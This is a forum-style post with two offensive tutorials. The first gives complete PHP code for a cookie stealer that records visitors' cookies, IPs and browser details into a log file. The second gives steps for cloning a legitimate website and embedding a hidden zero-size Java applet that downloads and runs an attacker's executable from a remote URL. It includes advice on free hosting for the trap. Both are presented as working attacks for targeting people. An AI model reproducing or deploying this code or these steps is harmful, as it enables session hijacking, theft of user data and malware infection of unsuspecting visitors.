franxu

Salut un nou tutorial. 1) First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php . You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php): <?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); echo '<b>Cookie Stealing</b>' ?> This script will record the cookies of every user that views it . 2) Now we need to get the vulnerable page to access this script. 3) Open log.txt Bonus : If you want to test this sursa: hacksociety

Welcome to the tutorial on how to turn any site into a java drive by (JDB) What is a java drive by? A java drive by is a website, and when you visit the web site you will get a box displayed that says you need to run java and when they press run it downloads and executes your virus without the person knowing. These can be very good when you want to target people with malware. Set Up Firstly you are going to need to download the Java Drive By Files. Download: JDB - Shuffler.rar Once Downloaded you will need to extract it with a unzipping program such as 7 ZIP or Win Rar etc. 1. Find the website you would like to clone. (Use Google Chrome For This!) 2. Once your on the site, Right Click and click "Save As" and then put into the folder you have just extracted in the same folder as "client.jar" 3. Rename the file you got from the website you just saved to "index" Pictures of this story: 4. Right click on index.html and press open with -> Notepad 5. Now you should see all the code for the website, scroll to the bottom of the text and make a few spaces and put the code in below. <APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0"> <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/yourprogram.exe"> </APPLET> Where it says yoursite.exe, you need to put a direct link to your file so upload your virus to: http://www.dlandexe.com/ and then add the direct link to the applet code. 6. Save your website in notepad by pressing either CTR + S or File-> Save. Pictures of the story: You have now successfully created a working java drive by, when you open the index page it should look like this: Now you need to upload it to a web site so you are going to need a domain + hosting Free hosting that doesn't delete your site: Free Web Hosting - No purchase required. (I host mine their) Free Domain: Dot TK - Free Domains for All http://www.co.cc/ I am not going to make a tutorial on this as it is pretty straight forward, register a domain and sign up for your hosting and then update your nameservers to your web hosting and then upload your Java Drive By in the Public_Html folder. If this helped show your likes with a comment ! ;D